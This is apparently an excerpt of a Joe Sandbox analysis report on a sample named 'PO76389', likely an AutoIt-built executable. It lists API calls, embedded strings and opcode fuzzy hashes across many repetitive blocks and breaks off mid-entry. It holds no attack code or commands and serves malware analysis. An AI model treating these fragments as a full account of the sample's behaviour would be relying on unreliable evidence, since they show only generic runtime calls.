                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: Combobox
                                                    • API String ID: 3850602802-2096851135
                                                    • Opcode ID: ea81d3ded665def699a888c703b2dac47a48ba3d080b0fb38655f76ad3a15379
                                                    • Instruction ID: 46529419be7703d818b7288ed2e6ecea8706655c78ecaf2736c22d891f958080
                                                    • Opcode Fuzzy Hash: ea81d3ded665def699a888c703b2dac47a48ba3d080b0fb38655f76ad3a15379
                                                    • Instruction Fuzzy Hash: 9A11E675300208BFFF118E54DC91EEB3BAAFB993A4F104124F92897290D635DC909BA0
                                                    APIs
                                                      • Part of subcall function 004CC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 004CC657
                                                      • Part of subcall function 004CC619: GetStockObject.GDI32(00000011), ref: 004CC66B
                                                      • Part of subcall function 004CC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 004CC675
                                                    • GetWindowRect.USER32(00000000,?), ref: 00519775
                                                    • GetSysColor.USER32(00000012), ref: 0051978F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                    • String ID: static
                                                    • API String ID: 1983116058-2160076837
                                                    • Opcode ID: 114ca6ee96d99df717d22644e5ebe078f61ebdffd51a6b4d797bd7689eaa8767
                                                    • Instruction ID: 5d99e655dd0dd94908804268eb7e22e8e309c9dfd0342f3456e7de79314aa4ae
                                                    • Opcode Fuzzy Hash: 114ca6ee96d99df717d22644e5ebe078f61ebdffd51a6b4d797bd7689eaa8767
                                                    • Instruction Fuzzy Hash: 13115972520209AFEB04DFB8D846EFA7BB8FF09304F040929F956D3280D634E891DB60
                                                    APIs
                                                    • GetWindowTextLengthW.USER32(00000000), ref: 005194A6
                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 005194B5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: LengthMessageSendTextWindow
                                                    • String ID: edit
                                                    • API String ID: 2978978980-2167791130
                                                    • Opcode ID: 8c1be1ab0caaac9ce5f1d50a6bad634625e96a7dba34759935d3b8333ea4955e
                                                    • Instruction ID: f932f623e2e86a431993c14aa103985e7fefc703bd89654a405a3d8d9c102f87
                                                    • Opcode Fuzzy Hash: 8c1be1ab0caaac9ce5f1d50a6bad634625e96a7dba34759935d3b8333ea4955e
                                                    • Instruction Fuzzy Hash: 9A115B71100204ABFF108E64AC95EEB3B69FB15378F104724F965931D0C7B59C96ABA1
                                                    APIs
                                                    • _memset.LIBCMT ref: 004F5CF3
                                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 004F5D12
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: InfoItemMenu_memset
                                                    • String ID: 0
                                                    • API String ID: 2223754486-4108050209
                                                    • Opcode ID: 15be5f7376850a4f83e39bc490c162422549564f7a3b504df4f0efd5f85dd857
                                                    • Instruction ID: 28a035e9e8d1587cfa73f6ba02fc4350920896900ad57851a0d6a53f687d6bf2
                                                    • Opcode Fuzzy Hash: 15be5f7376850a4f83e39bc490c162422549564f7a3b504df4f0efd5f85dd857
                                                    • Instruction Fuzzy Hash: 5711D671902A1CABEB20DB5CE848BBA77F8DB05344F144012EF55E7290D3749D05D799
                                                    APIs
                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0050544C
                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00505475
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Internet$OpenOption
                                                    • String ID: <local>
                                                    • API String ID: 942729171-4266983199
                                                    • Opcode ID: 2213712dacd397a9388cbd15499aa5e345b39bf53e78634d48c75640248345ca
                                                    • Instruction ID: a009ef07ff927178171e68ec01a46f0f5b44f103900767e4ed6004f4eed6efdd
                                                    • Opcode Fuzzy Hash: 2213712dacd397a9388cbd15499aa5e345b39bf53e78634d48c75640248345ca
                                                    • Instruction Fuzzy Hash: 94119E70541A21BADF258F618884EEFBEA8FF12752F10862AF54556080F270A984DEB0
                                                    APIs
                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004E4557
                                                    • ___raise_securityfailure.LIBCMT ref: 004E463E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: FeaturePresentProcessor___raise_securityfailure
                                                    • String ID: (W
                                                    • API String ID: 3761405300-2310960208
                                                    • Opcode ID: 4753c8a2e4f592209d55768386597b78d92cb94d5c241885fd2bb8140b4e75dc
                                                    • Instruction ID: a86798b25f633c7aae11c23cb5bb703a0dc1b9bcb5ae5fd8b1d34a9eb5619c86
                                                    • Opcode Fuzzy Hash: 4753c8a2e4f592209d55768386597b78d92cb94d5c241885fd2bb8140b4e75dc
                                                    • Instruction Fuzzy Hash: 3821EFB5510204DBD750DF59F995A417BE8AB68314F10682AE9098A3E0E3F469C8FF49
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: htonsinet_addr
                                                    • String ID: 255.255.255.255
                                                    • API String ID: 3832099526-2422070025
                                                    • Opcode ID: c7628033725248d75508cbe104690fe470925375dd271c94db4aca73e2b696cb
                                                    • Instruction ID: c56905aa418f1625e91a3face952fd55f1c0ed09e40b3d485e21a3fcc4123356
                                                    • Opcode Fuzzy Hash: c7628033725248d75508cbe104690fe470925375dd271c94db4aca73e2b696cb
                                                    • Instruction Fuzzy Hash: 1B01D236600305ABCB20AFB4D846FADBB74FF54724F10851AFA159B2D1D671E804C765
                                                    APIs
                                                      • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 004EC5E5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessageSend_memmove
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 1456604079-1403004172
                                                    • Opcode ID: cb859590799b8ce48d3b611ca548bd61d3e404fbf3c05f913529d5578acbfd05
                                                    • Instruction ID: b60727fbae51541f6c31436a6d6bdcf16f7cae8a266d04f6d90db866a9381da7
                                                    • Opcode Fuzzy Hash: cb859590799b8ce48d3b611ca548bd61d3e404fbf3c05f913529d5578acbfd05
                                                    • Instruction Fuzzy Hash: BF01F931501154ABCB04EB96CC919FF776AAB06311B140A1AF462A33C1DB7858099764
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: __fread_nolock_memmove
                                                    • String ID: EA06
                                                    • API String ID: 1988441806-3962188686
                                                    • Opcode ID: 41c600a1850bb2b9167cbe285e4e80419494bb3d3182f38a1526780a1427ba6e
                                                    • Instruction ID: 71ca61386ad2492a36181cb4d1d32907e07af16c7ae783b298bc3dd1e9610042
                                                    • Opcode Fuzzy Hash: 41c600a1850bb2b9167cbe285e4e80419494bb3d3182f38a1526780a1427ba6e
                                                    • Instruction Fuzzy Hash: 3A01F9719002187EDB18CB99C856FBE7BF89B05315F00415FE153D2281E478A708CB60
                                                    APIs
                                                      • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 004EC4E1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessageSend_memmove
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 1456604079-1403004172
                                                    • Opcode ID: ed8034e342302d6d9e73dd783914a147082b438d5184650010b7500bc8f9beb9
                                                    • Instruction ID: d944da55ce0eb37d12f00b8a75131cb111d10511cbd648008a187963feecd047
                                                    • Opcode Fuzzy Hash: ed8034e342302d6d9e73dd783914a147082b438d5184650010b7500bc8f9beb9
                                                    • Instruction Fuzzy Hash: C801F771641108ABCB14EB92C9A2EFF77B99F05305F14001AB503E32C1DA585E09A279
                                                    APIs
                                                      • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 004EC562
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessageSend_memmove
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 1456604079-1403004172
                                                    • Opcode ID: 527b8abf7e2bd26e6b28b53959e2febbe98063bec851ca317af6b2e733c09d25
                                                    • Instruction ID: 31106e36211e2613e0224c8e62076931ffcdfe1a76f522171e7b0efd1ecac0ad
                                                    • Opcode Fuzzy Hash: 527b8abf7e2bd26e6b28b53959e2febbe98063bec851ca317af6b2e733c09d25
                                                    • Instruction Fuzzy Hash: 8D01A7716411187BCB14E796C992FFF77A95B15706F24041AB403E32C1DA589E0AA379
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ClassName_wcscmp
                                                    • String ID: #32770
                                                    • API String ID: 2292705959-463685578
                                                    • Opcode ID: 4a17ca8f85e1ca572d9888847e76f365c65d41b08ca8cf8f82ee278c1f405d82
                                                    • Instruction ID: 6898743986aa1d32a2b9e79f8346bc544c099b604c5109f1225ba51691646f89
                                                    • Opcode Fuzzy Hash: 4a17ca8f85e1ca572d9888847e76f365c65d41b08ca8cf8f82ee278c1f405d82
                                                    • Instruction Fuzzy Hash: 05E0D13360022927D720DA55EC0AE97FB7DF751764F00001BF514D3141D7B4964587D4
                                                    APIs
                                                    • __umatherr.LIBCMT ref: 004DDA2A
                                                      • Part of subcall function 004DDD86: __ctrlfp.LIBCMT ref: 004DDDE5
                                                    • __ctrlfp.LIBCMT ref: 004DDA47
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: __ctrlfp$__umatherr
                                                    • String ID: xnR
                                                    • API String ID: 219961500-3686307339
                                                    • Opcode ID: 3c1cf1dd0556efb6126c0bee8f7890bc4706f489f4f769aae79fa3c55190e43b
                                                    • Instruction ID: 749fd0049311397a8c89306f87b4dc058bdf9b5ee470f2f306693c168a8086d8
                                                    • Opcode Fuzzy Hash: 3c1cf1dd0556efb6126c0bee8f7890bc4706f489f4f769aae79fa3c55190e43b
                                                    • Instruction Fuzzy Hash: 02E0657140860AAADF017F81E8066A93BA5EF14314F80409AF58C14296DFB645B4D75B
                                                    APIs
                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004EB36B
                                                      • Part of subcall function 004D2011: _doexit.LIBCMT ref: 004D201B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Message_doexit
                                                    • String ID: AutoIt$Error allocating memory.
                                                    • API String ID: 1993061046-4017498283
                                                    • Opcode ID: a5d58e5f26ca8e0d0d8a4610d3daf4d7fd73777ee3480a6dc14606eb0974c406
                                                    • Instruction ID: 23918a4c35ebe6d1b2a2f341bd5f4da05ae20368e8c60a6df1bec1883508dafd
                                                    • Opcode Fuzzy Hash: a5d58e5f26ca8e0d0d8a4610d3daf4d7fd73777ee3480a6dc14606eb0974c406
                                                    • Instruction Fuzzy Hash: D7D05B3138475833D21636967D17FCA7A9C9F55B96F00001BFF08A66D28ADA94C051FD
                                                    APIs
                                                    • GetSystemDirectoryW.KERNEL32(?), ref: 0052BAB8
                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0052BCAB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: DirectoryFreeLibrarySystem
                                                    • String ID: WIN_XPe
                                                    • API String ID: 510247158-3257408948
                                                    • Opcode ID: f9995ed16254ea3fbed9794f4ed8992ae512daa02e87cd55665e4f07fce47fb5
                                                    • Instruction ID: 2a4a67332ae16ce9bb9d5203dd33d3b81d513db322c32a41af014d419a45e40d
                                                    • Opcode Fuzzy Hash: f9995ed16254ea3fbed9794f4ed8992ae512daa02e87cd55665e4f07fce47fb5
                                                    • Instruction Fuzzy Hash: 8CE0C970C0411DEFDB15DBA9E84AAEDBBB8BF69300F148886E026B2190C7715A45EF25
                                                    APIs
                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 005184DF
                                                    • PostMessageW.USER32(00000000), ref: 005184E6
                                                      • Part of subcall function 004F8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 004F83CD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: FindMessagePostSleepWindow
                                                    • String ID: Shell_TrayWnd
                                                    • API String ID: 529655941-2988720461
                                                    • Opcode ID: 01a526d8108c01f07eeee1d191c7a056ea447f7cbd75e0f67f78d6c258c066bf
                                                    • Instruction ID: 1d9a92c5a4d55f6999763b2be84c9fdcdf2ab7d8792a51de7c44ddb7937d75ef
                                                    • Opcode Fuzzy Hash: 01a526d8108c01f07eeee1d191c7a056ea447f7cbd75e0f67f78d6c258c066bf
                                                    • Instruction Fuzzy Hash: A1D0C9723843147BE765A770EC4BFD66A64AB28B11F0409297759AA2D0C9E4B8148664
                                                    APIs
                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0051849F
                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 005184B2
                                                      • Part of subcall function 004F8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 004F83CD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
